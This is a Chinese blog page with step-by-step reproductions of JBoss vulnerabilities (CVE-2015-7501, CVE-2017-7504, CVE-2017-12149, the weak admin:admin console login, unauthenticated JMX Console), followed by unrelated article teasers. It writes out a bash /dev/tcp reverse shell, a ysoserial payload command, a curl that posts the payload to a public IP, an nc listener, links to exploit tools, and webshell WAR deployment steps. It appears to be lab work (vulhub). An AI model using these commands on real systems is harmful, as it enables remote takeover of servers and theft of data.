Jboss漏洞

devtools/2024/10/19 5:25:30/

三、Jboss

3.1 CVE-2015-7501

Jboss JMXInvokerServlet 反序列化漏洞

漏洞复现

1.POC,访问地址

/invoker/JMXInvokerServlet返回如下,说明接口开放,此接口存在反序列化漏洞

3.1 8080

工具

bash -i>& /dev/tcp/ip/4444 0>&1进行base64位编码

java -jar C:\Users\zzy\Desktop\ysoserial-all.jar "bash -c {echo,64位编码}|{base64,-d}|{bash,-i}">zzy666.ser

curl http://47.99.72.48:8080/invoker/JMXInvokerServlet --data-binary @zzy666.ser --output

开启监听nc -lvvp 端口

3.2 CVE-2017-7504

JBossMQ JMS 反序列化漏洞

漏洞复现

1.访问漏洞地址

/jbossmq-httpil/HTTPServerILServlet

2.利用工具:python3 E:\武器库\Jboss\jexboss\jexboss.py -u http://IP:8082

3.3 CVE-2017-12149

JBoss 5.x/6.x反序列化漏洞

漏洞复现

1.访问漏洞页面,看jboss版本

2.验证是否存在漏洞,访问

http://1.15.136.212:8080/invoker/readonly

该漏洞出现在/invoker/readonly中,服务器将用户post请求内容进行反序列化

返回500,说明页面存在,此页面存在反序列化漏洞

3.使用工具进行检测 DeserializeExploit 如果成功直接上传webshell即可:工具:https://cdn.vulhub.org/deserialization/DeserializeExploit.jar

也可以直接执行命令:GitHub - yunxu1/jboss-_CVE-2017-12149: CVE-2017-12149 jboss反序列化 可回显

3.4 Administration Console弱囗令
漏洞描述

Administration Console管理页面存在弱口令,`admin:admin`,登陆后台上传war包,getshell

漏洞复现

/admin-console/login.seam?conversationld=4

1.admin vulhub

2.点击web应用-add-选择文件-上传后门 shell.war

蚁剑连接:

3.5 8083

3.5 低版本JMX Console未授权

低版本JMX Console未授权访问Getshell

漏洞复现

1.访问

/jmx-console/

这里我们使用得复现环境不存在,所以需要密码(正常环境无需密码直接可进入)

2.然后找到jboss.deployment (jboss 自带得部署功能)中的flavor=URL,type=DeploymentScanner点进去(通过URL的方式远程部署)

找到页面中的void addURL()选项远程加载war包来部署。

3.制作war包,这里用之前制作好的 zzy3.war

蚁剑连接:

3.6 高版本JMX Console未授权

在JMX Console页面点击jboss.system链接,在Jboss.system页面中点击service=MainDeployer,如下

2.进入service=MainDeployer页面之后,找到methodlndex为17或19的deploy 填写远程war包地址进行远程部署

3.搭建远程部署,部署远程war包地址

4.然后输入Invoke,点击Invoke

5.连接Webshell


http://www.ppmy.cn/devtools/90490.html

相关文章

【从零开始一步步学习VSOA开发】创建VSOA的client端

创建VSOA的client端 创建工程 参考 hellovsoa 工程&#xff0c;创建 client 工程&#xff0c;工程源码修改如下&#xff1a; #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/select.h> #include "vsoa_client.h&q…

密码学基础-为什么使用真随机数(True Random Number Generators)

密码学基础-为什么使用真随机数&#xff08;True Random Number Generators&#xff09; 概述 随机的意义很重要&#xff0c;就像你的银行密码如果是亲朋好友的生日&#xff0c;结婚纪念日&#xff08;可预测的&#xff09;&#xff0c;那么就容易被人测试出来&#xff1b;而…

机器学习模型选择与优化: 打造智能IDS

引言 面对琳琅满目的机器学习模型&#xff0c;你是否也感到无从下手&#xff1f;别担心&#xff0c;这篇文章将为你详细讲解各种模型的优缺点&#xff0c;帮助你选择最适合的模型&#xff0c;并进行优化。是时候给你的入侵检测系统装上最强“大脑”了! 项目支持 毕业设计难…

PYTHON专题-(8)我错了该怎么整?

什么是异常处理&#xff1f; 异常处理是一种机制&#xff0c;用于在程序执行期间发生错误或异常时&#xff0c;对发生的异常进行捕获、处理和恢复&#xff0c;以确保程序能够继续执行或正确地终止。异常处理可以包括捕获异常、处理异常&#xff0c;以及执行相应的操作来处理异常…

Bug太多,苹果手机升级到18.1后怎么降级

最近苹果公司发布了iOS 18.1开发者测试版和macOS Sequoia 15.1的开发者测试版&#xff0c;此次发布的iOS18.1开发者测试版本苹果给其带来了两个重要的新功能。 1、通话录音功能 现在只要拨打或者是接听电话&#xff0c;界面左上角就会出现通话录音按键&#xff0c;点击即可开启…

书生大模型学习笔记2 - Python

Python实现wordcount 请实现一个wordcount函数&#xff0c;统计英文字符串中每个单词出现的次数。返回一个字典&#xff0c;key为单词&#xff0c;value为对应单词出现的次数。 解题思路&#xff1a;首先把字母转小写>然后把单词取出来去除标点>循环单词列表>key已存…

面向对象之设计模式,四种内部类,类关系

面向对象 1. 类关系 继承 使用extends表示,类和类单继承,接口和接口多继承,多个逗号隔开 又叫泛化关系 实现 类和接口是多实现关系,多个逗号隔开,通过关键字 implements表示 依赖 一个类中的局部变量 ,保存了另一个类对象 关联 又叫强依赖,一个类中的成员变量,是另一个类对象…

Animate软件基本概念:传统补间、补间动画及补间形状

这里主要讲Animate软件中三种基本的补间类型的概念。 FlashASer&#xff1a;AdobeAnimate2021软件零基础入门教程https://zhuanlan.zhihu.com/p/633230084 FlashASer&#xff1a;实用的各种Adobe Animate软件教程https://zhuanlan.zhihu.com/p/675680471 FlashASer&#xff…